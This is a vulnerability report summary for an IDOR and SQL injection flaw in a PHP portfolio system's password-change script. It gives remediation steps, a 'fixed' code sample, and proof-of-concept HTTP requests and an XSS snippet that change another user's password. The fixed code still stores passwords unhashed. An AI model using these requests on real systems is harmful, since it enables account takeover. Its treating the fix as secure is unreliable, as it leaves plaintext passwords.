# CVE Report Summary: 1000project IDOR Vulnerability - Password Modification ## Vulnerability Overview * **Vulnerability Type**: IDOR (Insecure Direct Object Reference) * **Severity**: High (CVSS 3.1: 8.8) * **Affected Product**: 1000project (Portfolio Management System MCA) * **Affected Version**: 1.0 * **Vulnerable File**: `update_passwd_process.php` * **Root Cause**: The system blindly trusts the `$_SESSION['temp_user']` variable without verifying whether the current user has permission to modify the target account, and it is also susceptible to SQL injection. ## Impact Scope * **Account Takeover**: Attackers can modify the passwords of any user. * **Data Leakage**: Sensitive information within compromised accounts can be accessed. * **Privilege Escalation**: Higher privileges can be obtained by targeting administrator accounts. * **Identity Theft**: Personally Identifiable Information (PII) may be compromised. ## Remediation 1. **Session Management**: Use session variables that are difficult to manipulate, securely store user identities, and implement session validation. 2. **Access Control**: Always verify user identity before performing sensitive operations, implement Role-Based Access Control (RBAC), and log all password change attempts. 3. **Input Validation**: Validate all user inputs, use prepared statements for all database operations, and enforce password strength requirements. 4. **Security Monitoring**: Monitor for anomalous password change patterns, implement rate limiting for password change attempts, and alert on suspicious account activity. ## Remediation Code (Recommended Fix) ```php // update_passwd_process.php - FIXED VERSION include("connection.php"); session_start(); if(isset($_POST['change'])) { $newpassword = $_POST['newpassword']; $cpassword = $_POST['cpassword']; // 1. Use the current session user, not temp_user $current_user = $_SESSION['user']; // This should be set during login if($newpassword != $cpassword) { $_SESSION['change-passwd'] = "Password does not match. Please Provide valid one."; header("location:changepasswd.php"); } else { // 2. Use prepared statements to prevent SQL injection $stmt = $conn->prepare("UPDATE reg_details SET reg_passwd = ? WHERE reg_email = ?"); $stmt->bind_param("ss", $newpassword, $current_user); $result = $stmt->execute(); if($result){ $_SESSION['pass-succ'] = "Password is changed successfully. You may login now."; header("location:changepasswd.php"); } else { $_SESSION['pass-err'] = "Something is wrong. Please try again later."; header("location:changepasswd.php"); } } } ``` ## Proof of Concept (PoC) ### Normal Password Modification ```http # Normal password change request POST /update_passwd_process.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=user_session newpassword=newpassword123&cpassword=newpassword123&change=Change # Result: Current user's password changed ``` ### IDOR Attack - Modifying Administrator Password ```http # Step 1: Attacker logs in as regular user # Step 2: Attacker manipulates session (e.g., through XSS or session Fixation) # Step 3: Attacker submits password change request POST /update_passwd_process.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=hacked_session newpassword=attackerpassword&cpassword=attackerpassword&change=Change # Result: Admin's password changed to attacker's chosen password ``` ### Via XSS Attack ```html // Inject via XSS vulnerability document.cookie = "PHPSESSID=hacked_session"; // Manipulate temp_user session variable fetch('/update_passwd_process.php', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'newpassword=hacked&cpassword=hacked&change=Change' }); ```